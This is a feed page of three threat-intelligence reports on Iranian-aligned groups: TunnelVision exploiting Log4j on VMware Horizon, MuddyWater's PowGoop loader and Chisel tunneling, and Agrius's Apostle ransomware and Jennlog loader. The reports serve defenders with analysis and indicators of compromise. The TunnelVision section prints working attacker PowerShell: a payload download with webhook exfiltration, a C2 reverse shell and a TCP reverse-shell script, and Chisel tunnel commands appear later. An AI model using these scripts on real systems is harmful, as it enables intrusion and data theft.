There are new articles available, click to refresh the page.
Before yesterdaySentinelLabs

Log4j2 In The Wild | Iranian-Aligned Threat Actor β€œTunnelVision” Actively Exploiting VMware Horizon

17 February 2022 at 17:11

By Amitai Ben Shushan Ehrlich and Yair Rigevsky

Executive Summary

  • SentinelLabs has been tracking the activity of an Iranian-aligned threat actor operating in the Middle-East and the US.
  • Due to the threat actor’s heavy reliance on tunneling tools, as well as the unique way it chooses to widely deploy those, we track this cluster of activity as TunnelVision.
  • Much like other Iranian threat actors operating in the region lately, TunnelVision’s activities were linked to deployment of ransomware, making the group a potentially destructive actor.


TunnelVision activities are characterized by wide-exploitation of 1-day vulnerabilities in target regions. During the time we’ve been tracking this actor, we have observed wide exploitation of Fortinet FortiOS (CVE-2018-13379), Microsoft Exchange (ProxyShell) and recently Log4Shell. In almost all of those cases, the threat actor deployed a tunneling tool wrapped in a unique fashion. The most commonly deployed tunneling tools used by the group are Fast Reverse Proxy Client (FRPC) and Plink.

TunnelVision activities are correlated to some extent with parts of Microsoft’s Phosphorus, as discussed further in the Attribution section.

In this post, we highlight some of the activities we recently observed from TunnelVision operators, focusing around exploitation of VMware Horizon Log4j vulnerabilities.

VMware Horizon Exploitation

The exploitation of Log4j in VMware Horizon is characterized by a malicious process spawned from the Tomcat service of the VMware product (C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe).

TunnelVision attackers have been actively exploiting the vulnerability to run malicious PowerShell commands, deploy backdoors, create backdoor users, harvest credentials and perform lateral movement.

Typically, the threat actor initially exploits the Log4j vulnerability to run PowerShell commands directly, and then runs further commands by means of PS reverse shells, executed via the Tomcat process.

PowerShell Commands

TunnelVision operators exploited the Log4j vulnerability in VMware Horizon to run PowerShell commands, sending outputs back utilizing a webhook. In this example, the threat actor attempted to download ngrok to a compromised VMware Horizon server:

    (New-Object System.Net.WebClient).DownloadFile("hxxp://transfer.sh/uSeOFn/ngrok.exe","C:\\Users\Public\public.exe");
    Rename-Item 'c://Users//public//new.txt' 'microsoft.exe';
    $a=iex 'dir "c://Users//public//"' | Out-String;
    iwr -method post -body $a https://webhook.site/{RANDOM-GUID} -UseBasicParsing;
    iwr -method post -body $Error[0] https://webhook.site/{RANDOM-GUID} -UseBasicParsing;

Throughout the activity the usage of multiple legitimate services was observed. Given an environment is compromised by TunnelVision, it might be helpful to look for outbound connections to any of those legitimate public services:

  • transfer.sh
  • pastebin.com
  • webhook.site
  • ufile.io
  • raw.githubusercontent.com

Reverse Shell #1

$c = ""
$p = ""
$r = ""
$u = "hxxps://www.microsoft-updateserver.cf/gadfTs55sghsSSS"
$wc = New-Object System.Net.WebClient
$li = (Get-NetIPAddress -AddressFamily IPv4).IPAddress[0];
$c = "whoami"
$c = 'Write-Host " ";'+$c
$r = &(gcm *ke-e*) $c | Out-String > "c:\programdata\$env:COMPUTERNAME-$li"
$ur = $wc.UploadFile("$u/phppost.php" , "c:\programdata\$env:COMPUTERNAME-$li")
    $c = $wc.DownloadString("$u/$env:COMPUTERNAME-$li/123.txt")
    $c = 'Write-Host " ";'+$c
    if($c -ne $p)
        $r = &(gcm *ke-e*) $c | Out-String > "c:\programdata\$env:COMPUTERNAME-$li"
        $p = $c
        $ur = $wc.UploadFile("$u/phppost.php" , "c:\programdata\$env:COMPUTERNAME-$li")
    sleep 3

Reverse Shell #1 was used in the past by TunnelVision operators (7feb4d36a33f43d7a1bb254e425ccd458d3ea921), utilizing a different C2 server: β€œhxxp://google.onedriver-srv.ml/gadfTs55sghsSSS”. This C2 was referenced in several articles analyzing TunnelVision activities.

Throughout the activity the threat actor leveraged another domain, service-management[.]tk, used to host malicious payloads. According to VirusTotal, this domain was also used to host a zip file (d28e07d2722f771bd31c9ff90b9c64d4a188435a) containing a custom backdoor (624278ed3019a42131a3a3f6e0e2aac8d8c8b438).

The backdoor drops an additional executable file (e76e9237c49e7598f2b3f94a2b52b01002f8e862) to %ProgramData%\Installed Packages\InteropServices.exe and registers it as a service named β€œInteropServices”.

The dropped executable contains an obfuscated version of the reverse shell as described above, beaconing to the same C2 server (www[.]microsoft-updateserver[.]cf). Although it is not encrypted, it is deobfuscated and executed in a somewhat similar manner to how PowerLess, another backdoor used by the group, executes its PowerShell payload.

Reverse Shell #2

$hst = "";
$prt = 443;
function watcher() {;
    $limit = (Get - Random  - Minimum 3  - Maximum 7);
    $stopWatch = New - Object  - TypeName System.Diagnostics.Stopwatch;
    $timeSpan = New - TimeSpan  - Seconds $limit;
    while ((($stopWatch.Elapsed).TotalSeconds  - lt $timeSpan.TotalSeconds) )  {};
$arr = New - Object int[] 500;
for ($i = 0;
$i  - lt 99;
$i++) {;
    $arr[$i] = (Get - Random  - Minimum 1  - Maximum 25);
if ($arr[0]  - gt 0)  {;
    $valksdhfg = New - Object System.Net.Sockets.TCPClient($hst, $prt);
    $banljsdfn = $valksdhfg.GetStream();
    [byte[]]$bytes = 0..65535|% {
    while (($i = $banljsdfn.Read($bytes, 0, $bytes.Length))  - ne 0)  {;
        $lkjnsdffaa = (New - Object  - TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
        $nsdfgsahjxx = (&(gcm('*ke-exp*')) $lkjnsdffaa 2 > &1 | Out - String );
        $nsdfgsahjxx2 = $nsdfgsahjxx  +  (pwd).Path  +  "> ";
        $sendbyte = ([text.encoding]::ASCII).GetBytes($nsdfgsahjxx2);
        $banljsdfn.Write($sendbyte, 0, $sendbyte.Length);

Most of the β€œonline” activities we observed were performed from this PowerShell backdoor. It seems to be a modified variant of a publicly available PowerShell one-liner.

Among those activities were:

  • Execution of recon commands.
  • Creation of a backdoor user and adding it to the administrators group.
  • Credential harvesting using Procdump, SAM hive dumps and comsvcs MiniDump.
  • Download and execution of tunneling tools, including Plink and Ngrok, used to tunnel RDP traffic.
  • Execution of a reverse shell utilizing VMware Horizon NodeJS component[1,2].
  • Internal subnet RDP scan using a publicly available port scan script.

Throughout the activity, the threat actor utilized a github repository β€œVmWareHorizon” of an account owned by the threat actor, using the name β€œprotections20”.


TunnelVision activities have been discussed previously and are tracked by other vendors under a variety of names, such as Phosphorus (Microsoft) and, confusingly, either Charming Kitten or Nemesis Kitten (CrowdStrike).

This confusion arises since activity that Microsoft recognizes as a single group, β€œPhosphorous”, overlaps with activity that CrowdStrike distinguishes as belonging to two different actors, Charming Kitten and Nemesis Kitten.

We track this cluster separately under the name β€œTunnelVision”. This does not imply we believe they are necessarily unrelated, only that there is at present insufficient data to treat them as identical to any of the aforementioned attributions.

Indicators of Compromise

Domain www[.]microsoft-updateserver[.]cf Command and Control (C2) Server
Domain www[.]service-management[.]tk Payload server
IP 51.89.169[.]198 Command and Control (C2) Server
IP 142.44.251[.]77 Command and Control (C2) Server
IP 51.89.135[.]142 Command and Control (C2) Server
IP 51.89.190[.]128 Command and Control (C2) Server
IP 51.89.178[.]210 Command and Control (C2) Server, Tunneling Server
IP 142.44.135[.]86 Tunneling Server
IP 182.54.217[.]2 Payload Server
Github Account https://github.com/protections20 Account utilized to host payloads

Wading Through Muddy Waters | Recent Activity of an Iranian State-Sponsored Threat Actor

12 January 2022 at 21:25


MuddyWater is commonly considered an Iranian state-sponsored threat actor but no further granularity has previously been available. As of January 12th, 2022, U.S. CyberCommand has attributed this activity to the Iranian Ministry of Intelligence (MOIS). While some cases allow for attribution hunches, or even fleshed out connections to handles and online personas, attribution to a particular government organization is often reserved to the kind of visibility only available to governments with a well-developed all-source and signals intelligence apparatus.

As in all cases of public government attribution, we take this as an opportunity to reassess our assumptions about a given threat actor all the while recognizing that we can’t independently verify the basis for this claim.

U.S. Cyber Command pointed to multiple malware sets used by MuddyWater. Among those, PowGoop correlates with activities we’ve triaged in recent incidents. We hope sharing relevant in-the-wild findings will further bolster our collective defense against this threat.

Iranian MOIS hacker group #MuddyWater is using a suite of malware to conduct espionage and malicious activity. If you see two or more of these malware on your network, you may have MuddyWater on it: https://t.co/xTI6xuQOg3. Attributed through @NCIJTF @FBI

β€” USCYBERCOM Cybersecurity Alert (@CNMF_CyberAlert) January 12, 2022

Analysis of New PowGoop Variants

PowGoop is a malware family first described by Palo Alto which utilizes DLL search order hijacking (T1574.001). The name derives from the usage β€˜GoogleUpdate.exeβ€˜ to load a malicious modified version of β€˜goopdate.dllβ€˜, which is used to load a malicious PowerShell script from an external file. Other variants were described by ClearSkySec and Symantec.

We identified newer variants of PowGoop loader that involve significant changes, suggesting the group continues to use and maintain it even after recent exposures. The new variants reveal that the threat group has expanded its arsenal of legitimate software used to load malicious DLLs. Aside from β€˜GoogleUpdate.exe’, three additional benign pieces of software are abused in order to sideload malicious DLLs: β€˜Git.exe’, β€˜FileSyncConfig.exe’ and β€˜Inno_Updater.exe’.

Each contains a modified DLL and a renamed authentic DLL. The hijacked DLL contains imports originating from its renamed counterpart, as well as two additional functions written by the attackers. The list of hijacked DLLs is presented below:

Software Name Hijacked DLL Renamed DLL
GoogleUpdate.exe goopdate.dll goopdate86.dll
inno_updater.exe vcruntime140.dll vcruntime141.dll
FileSyncConfig.exe vcruntime140.dll vcruntime141.dll
git.exe libpcre2-8-0.dll libpcre2-8-1.dll

Unlike previous versions, the hijacked DLLs attempt to reflectively load two additional files, one named β€˜Core.dat’, which is a shellcode called from the export β€˜DllReg’ and the other named β€˜Dore.dat’, which is a PE file with a `MZRE` header, allowing it to execute as a shellcode as well, similarly to the publicly reported techniques, called from the export β€˜DllRege’.

Those two β€˜.dat’ files are identical for each of the hijacked DLLs and are both executed using rundll32 on their respective export, which reads the file from disk to a virtually allocated buffer, followed by a call to offset 0 in the read data.

Both β€˜Dore.dat’ and β€˜Core.dat’ search for a file named β€˜config.txt’ and run it using PowerShell in a fashion similar to older versions (T1059.001). The overlap in functionality between the two components is not clear; however, it is evident that β€˜Core.dat’ represents a more mature and evolved version of PowGoop as it is loaded as a shellcode, making it less likely to be detected statically.

It is also worth noting that it is not necessary for both components to reside on the infected system as the malware will execute successfully with either one. Given that, it is possible that one or the other could be used as a backup component. The PowerShell payloads within β€˜config.txt’ could not be retrieved at the time of writing.

Execution flow of new PowGoop variants
Execution flow of new PowGoop variants

MuddyWater Tunneling Activity

The operators behind MuddyWater activities are very fond of tunneling tools, as described in several recent blog posts(T1572). The custom tools used by the group often provide limited functionality, and are used to drop tunneling tools which enable the operators to conduct a wider set of activities. Among the tunneling tools MuddyWater attackers were observed using are Chisel, SSF and Ligolo.

The nature of tunneling activities is often confusing. However, analysis of Chisel executions by MuddyWater operators on some of the victims helps clarify their usage of such tools. This is an example of a command executed by the attackers on some of the victims:

 SharpChisel.exe client xx.xx.xx.xx:8080 r:8888:

The β€œr” flag used in the client execution implies the server is running in β€œreverse” mode. Setting the --reverse flag, according to Chisel documentation, β€œallows clients to specify reverse port forwarding remotes in addition to normal remotes”.

In this case, the β€œSharpChisel.exe” client runs on the victim machine, connects back to the Chisel server over port 8080, and specifies to forward anything coming over port 8888 of the server to port 9999 of the client.

This might look odd at first sight as port 9999 is not normally used on Windows machines and is not bound to any specific service. This is clarified shortly afterwards as the reverse tunnel is followed by setting up a Chisel SOCKS5 server on the victim, waiting for incoming connections over port 9999:

SharpChisel.exe server -p 9999 --socks5

By setting up both a server and a client instance of Chisel on the machine, the operators enable themselves to tunnel a variety of protocols which are supported over SOCKS5. This actually creates a tunnel within a tunnel. Given that, it is most likely the operator initiated SOCKS traffic to the server over port 8888, tunneling traffic from applications of interest to inner parts of the network.

The usage of Chisel and other tunneling tools effectively enable the threat actor to connect to machines within target environments as if they were inside the operator LAN.

Summary of MuddyWater tunneling using Chisel
Summary of MuddyWater tunneling using Chisel

Exchange Exploitation

When tracking MuddyWater activity, we came across an interesting subset of activity targeting Exchange servers of high-profile organizations. This subset of Exchange exploitation activity is rather interesting, as without context it would be difficult to attribute it to MuddyWater because the activity relies almost completely on publicly available offensive security tools.
The attackers attempt to exploit Exchange servers using two different tools:

  • A publicly available script for exploiting CVE-2020-0688 (T1190)
  • Ruler – an open source Exchange exploitation framework

CVE-2020-0688 Exploitation

Analysis of the activity observed suggests the MuddyWater threat group attempted to exploit CVE-2020-0688 on governmental organizations in the Middle East. The exploit enables remote code execution for an authenticated user. The specific exploit MuddyWater operators were attempting to run was utilized to drop a webshell.

The attempted webshell drop was performed using a set of PowerShell commands that write the webshell content into a specific path β€œ/ecp/HybridLogout.aspxβ€œ. The webshell awaits the parameter β€œcmd” and runs the commands in it utilizing XSL Script Processing (T1220).

A snippet of the webshell MuddyWater attempted to upload to Exchange servers
A snippet of the webshell MuddyWater attempted to upload to Exchange servers

This activity is highly correlated with a CVE-2020-0688 exploitation script from a Github repository named fuckchina_v2.py. The script utilizes CVE-2020-0688 to upload an ASPX webshell to the path : β€œ/ecp/HybridLogout.aspx” (T1505.003). It is also one of the only publicly available CVE-2020-0688 implementations that drop a web shell.

A snippet of CVE-2020-0688 exploitation script
A snippet of CVE-2020-0688 exploitation script

Ruler Exploitation

Among other activities performed by the threat actors was attempted Ruler exploitation. The instance identified targeted a telecommunication company in the Middle East. The observed activity suggests the threat actor attempted to create malicious forms, which is one of the most common usages of Ruler (T1137.003).

Usage of Ruler was previously associated with other Iranian threat actors, most commonly with APT33.


Analysis of MuddyWater activity suggests the group continues to evolve and adapt their techniques. While still relying on publicly available offensive security tools, the group has been refining its custom toolset and utilizing new techniques to avoid detection. This is observed through the three distinct activities observed and analyzed in this report: The evolution of the PowGoop malware family, the usage of tunneling tools, and the targeting of Exchange servers in high-profile organizations.

Like many other Iranian threat actors, the group displays less sophistication and technological complexity compared to other state-sponsored APT groups. Even so, it appears MuddyWater’s persistency is a key to their success, and their lack of sophistication does not appear to prevent them from achieving their goals.

Indicators of Compromise

PowGoop variants (MD5, SHA1, SHA256)

  • Goopdate.dll
    • A5981C4FA0A3D232CE7F7CE1225D9C7E
    • 8FED2FF6B739C13BADB14C1A884D738C80CB6F34
    • AA48F06EA8BFEBDC0CACE9EA5A2F9CE00C094CE10DF52462C4B9E87FEFE70F94
  • Libpcre2-8-0.dll
    • F8E7FF6895A18CC3D05D024AC7D8BE3E
    • 97248B6E445D38D48334A30A916E7D9DDA33A9B2
    • F1178846036F903C28B4AB752AFE1B38B531196677400C2250AC23377CF44EC3
  • Vcruntime140.dll
    • CEC48BCDEDEBC962CE45B63E201C0624
    • 81F46998C92427032378E5DEAD48BDFC9128B225
    • DD7EE54B12A55BCC67DA4CEAED6E636B7BD30D4DB6F6C594E9510E1E605ADE92
  • Core.dat
    • A65696D6B65F7159C9FFCD4119F60195
    • 570F7272412FF8257ED6868D90727A459E3B179E
    • B5B1E26312E0574464DDEF92C51D5F597E07DBA90617C0528EC9F494AF7E8504
  • Dore.dat
    • 6C084C8F5A61C6BEC5EB5573A2D51FFB
    • 61608ED1DE56D0E4FE6AF07ECBA0BD0A69D825B8
    • 7E7545D14DF7B618B3B1BC24321780C164A0A14D3600DBAC0F91AFBCE1A2F9F4


  • T1190 – Exploit Public-Facing Application
  • T1572 – Protocol Tunneling
  • T1574.001 – Hijack Execution Flow: DLL Search Order Hijacking
  • T1059.001 – Command and Scripting Interpreter: PowerShell
  • T1505.003 – Server Software Component: Web Shell
  • T1220 – XSL Script Processing

New Version Of Apostle Ransomware Reemerges In Targeted Attack On Higher Education

30 September 2021 at 16:20

SentinelLabs has been tracking the activity of Agrius, a suspected Iranian threat actor operating in the Middle East, throughout 2020 and 2021 following a set of destructive attacks starting December 2020. Since we last reported on this threat actor in May 2020, Agrius lowered its profile and was not observed conducting destructive activity. This changed recently as the threat actor likely initiated a ransomware attack on the Israeli university Bar-Ilan utilizing the group’s custom Apostle ransomware.

Although the full technical details of the incident were not disclosed publicly, some information was released to the public, most notably the ransom demand text file dropped on victim machines. The .txt file matches that from a new version of Apostle compiled on August 15, 2021, the day of the attack.

The new version of Apostle is obfuscated, encrypted and compressed as a resource in a loader we call Jennlog, as it attempts to masquerade payload in resources as log files. Before executing the Apostle payload, Jennlog runs a set of tests to verify that it is not being executed in an analysis environment based on an embedded configuration. Following the analysis of the Jennlog loader, SentinelLabs retrieved an additional variant of Jennlog, used to load and run OrcusRAT.

Jennlog Analysis

Jennlog (5e5e526a69490399494dcd7195bb6c67) is a .NET loader that deobfuscates, decompresses and decrypts a .NET executable from a resource embedded within the file. The resources within the loader appear to look like log files, and it contains both the binary to run as well as a configuration for the malware’s execution.

Jennlog attempts to extract two different resources:

  • helloworld.pr.txt – stores Apostle payload and the configuration.
  • helloworld.Certificate.txt – contains None. If configured to do so, the malware compares the MD5 value of the system information (used as system fingerprint) to the contents of this resource.

The payload hidden in β€œhelloworld.pr.txt” appears to look like a log file at first sight:

Contents of β€œhelloworld.pr.txt” resource embedded within Jennlog

The payload is extracted from the resource by searching for a separator word – β€œJennifer”. Splitting the contents of the resource results in an array of three strings:

  1. Decoy string – Most likely there to make the log file look more authentic.
  2. Configuration string – Used to determine the configuration of the malware execution.
  3. Payload – An obfuscated, compressed and encrypted file.


The configuration of Jennlog consists of 13 values, 12 of which are actually used in this version of the malware. In the variants we were able to retrieve, all of these flags are set to 0.

Jennlog configuration values

One of the most interesting flags found here is the certificate flag. If this flag is set, it will cause the malware to run only on a specific system. If this system does not match the configured MD5 fingerprint, the malware either stops operation or deletes itself utilizing the function ExecuteInstalledNodeAndDelete(), which creates and runs a BAT file as observed in other Agrius malware.

Jennlog ExecuteInstalledNodeAndDelete() function

Following all the configuration based-checks, Jennlog continues to unpack the main binary from within the resource β€œhelloworld.pr.txt” by performing the following string manipulations in the function EditString() on the obfuscated payload:

  • Replace all β€œ\nLog” with β€œA”.
  • Reverse the string.
  • Remove all whitespaces.

This manipulation will result in a long base64-encoded deflated content, which is inflated using the function stringCompressor.Unzip(). The inflated content highly resembles the contents of the original obfuscated payload, and it is deobfuscated again using the EditString() function.

The deobfuscation of the inflated content is carried out in a rather peculiar way, being run as a β€œcatch” statement after attempting to turn a string containing a URL to int, which will always result in an error. The domain presented in the URL was never bought, and highly resembles other Agrius malware unpurchased domains, often used as β€œSuper Relays”. Here, however, the domain is not actually contacted.

Execution of EditString() function as a catch statement

Following a second run of the EditString() function, Jennlog decodes the extracted content and decrypts it using an implementation of RC4 with a predefined key. The extracted content found in this sample is a new version of the Apostle ransomware, which is loaded into memory and ran using the parameters given to Jennlog at execution.

Apostle Ransomware Analysis

The new variant of Apostle (cbdbda089f7c7840d4daed22c34969fd876315b6) embedded within the Jennlog loader was compiled on August 15, 2021, the day the attack on Bar-Ilan university was carried out. Its execution flow is highly similar to the variant described in previous reports, and it even checks for the same Mutex as the previous ransomware variant.

The message embedded within it, however, is quite different:

Ooops, Your files are encrypted!!! Don't worry,You can return all your files! 
If you want to restore theme, Send $10000 worth of Monero to following address : Β 
Then follow this Telegram ID :Β  hxxps://t[.]me/x4ran

This is the exact same message that was released to the media in the context of the Bar-Ilan ransomware incident, as reported on ynet:

Ransom demand text file as seen in Bar-Ilan university

Other than the ransom demand note, the wallpaper picture used on affected machines was also changed, this time presenting an image of a clown:

New Apostle variant wallpaper image

OrcusRAT Jennlog Loader

An additional variant of Jennlog (43b810f918e357669be42030a1feb727) was uploaded to VirusTotal on July 14, 2021 from Iran. This variant is highly similar to the one used to load Apostle, and contains a similar configuration scheme (all set to 0). It is used to load a variant of OrcusRAT, which is extracted from the files resources in a similar manner.

The OrcusRAT variant (add7b6b60e746c36a66f5ec233873372) extracted from within it was submitted to VT on June 20, 2021 using the same submitter ID from Iran. It seems to connect to an internal IP address –, indicating it might have been used for testing. It also contained the following PDB path:



Agrius has shown a willingness to strategically wipe systems and has continued to evolve its toolkit to enable ransomware operations. At this time, we don’t know if the actor is committed to financially-motivated operations, but we do know the original intent was sabotage. We expect the sort of subterfuge seen here to be deployed in future Agrius operations. SentinelLabs continues to track the development of this nascent threat actor.

Technical Indicators

Jennlog Loader (Apostle Loader)

  • 5e5e526a69490399494dcd7195bb6c67
  • c9428afa269bbf8c48a08a7109c553163d2051e7
  • 0ba324337b1d76a5afc26956d4dc9f57786483230112eaead5b5c92022c089c7

Apostle – Bar-Ilan variant

  • fc8221382521a40ec0042431a947a3ca
  • cbdbda089f7c7840d4daed22c34969fd876315b6
  • 44c13c46d4f597ea0625f1c87eecffe3cd5dcd257c5fac18a6fa931ba9b5f97a

Jennlog Loader (OrcusRAT Loader)

  • 43b810f918e357669be42030a1feb727
  • 3de36410a99cf3bd8e0c56fdeafa32bbf7625af1
  • 14659857df1753f720ac797a43a9c3f3e241c3df762de7f50bbbae00feb818c9


  • add7b6b60e746c36a66f5ec233873372
  • a35bffc49871bb3a48bdd35b4a4d04d208f23487
  • 069686119adc13e1785cb7a425611d1ec13f33ae75962a7e50e00414209d1809

  • There are no more articles